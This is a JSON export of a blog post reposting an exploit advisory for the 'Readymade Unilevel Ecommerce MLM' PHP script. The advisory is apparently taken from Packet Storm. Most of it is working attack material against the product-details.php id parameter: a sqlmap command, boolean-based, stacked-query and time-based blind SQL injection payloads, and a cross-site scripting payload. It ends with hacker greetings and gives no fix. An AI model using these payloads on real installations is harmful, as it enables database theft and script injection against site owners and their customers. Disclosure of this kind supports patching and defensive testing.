{"id":58599,"date":"2024-08-02T19:40:41","date_gmt":"2024-08-02T16:40:41","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179886\/rmulecommmlm-sqlxss.txt"},"modified":"2024-08-02T19:40:41","modified_gmt":"2024-08-02T16:40:41","slug":"readymade-unilevel-ecommerce-mlm-blind-sql-injection-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/readymade-unilevel-ecommerce-mlm-blind-sql-injection-cross-site-scripting\/","title":{"rendered":"ReadyMade Unilevel Ecommerce MLM Blind SQL Injection \/ Cross Site Scripting"},"content":{"rendered":"[x]========================================================================================================================================[x]| Title : Readymade Unilevel Ecommerce MLM Blind SQL &amp; XSS Vulnerabilities<br \/>| Software : Readymade Unilevel Ecommerce<br \/>| Last Update : 15\/03\/24 [TESTED VERSION SCRIPT]| First Release: 16\/11\/21<br \/>| Vendor : http:\/\/www.i-netsolution.com\/<br \/>| Date : 01 August 2024<br \/>| Author : OoN_Boy<br \/>[x]========================================================================================================================================[x]| Technology : PHP<br \/>| Database : MySQL<br \/>| Price : $500<br \/>| Description : MLM Unilevel Plan Script developed by experts and professionals. 
Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.<br \/>[x]========================================================================================================================================[x]\n[O] Exploit<\/p>\n<p>http:\/\/localhost\/eommlm\/product-details.php?id=11[SQL]http:\/\/localhost\/ecomlm\/product-details.php?id=11[XSS]\n[O] Proof of concept<\/p>\n<p>sqlmap.py -u &#8220;http:\/\/localhost\/eommlm\/product-details.php?id=11&#8221; &#8211;invalid-string<\/p>\n[SQL]Parameter: id (GET)<br \/>Type: boolean-based blind<br \/>Title: AND boolean-based blind &#8211; WHERE or HAVING clause<br \/>Payload: id=11 AND 1189=1189<\/p>\n<p>Type: stacked queries<br \/>Title: MySQL &gt;= 5.0.12 stacked queries (comment)<br \/>Payload: id=11;SELECT SLEEP(10)#<\/p>\n<p>Type: time-based blind<br \/>Title: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br \/>Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)<\/p>\n[XSS] <br \/>http:\/\/localhost\/ecomlm\/product-details.php?id=11&#8243;&gt;&lt;img\/src\/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY&gt;<\/p>\n[x]========================================================================================================================================[x]\n[O] Greetz<\/p>\n<p>BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^<\/p>\n[x]========================================================================================================================================[x]\n","protected":false},"excerpt":{"rendered":"<p>[x]========================================================================================================================================[x]| Title : Readymade Unilevel Ecommerce MLM Blind SQL &amp; XSS Vulnerabilities| Software : Readymade Unilevel Ecommerce| Last Update : 
15\/03\/24 [TESTED VERSION SCRIPT]| First Release: 16\/11\/21| Vendor : http:\/\/www.i-netsolution.com\/| Date : 01 August 2024| Author : OoN_Boy[x]========================================================================================================================================[x]| Technology : PHP| Database : MySQL| Price : $500| Description : MLM Unilevel Plan Script developed by &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58599","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58599","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58599"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58599\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58599"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58599"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58599"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}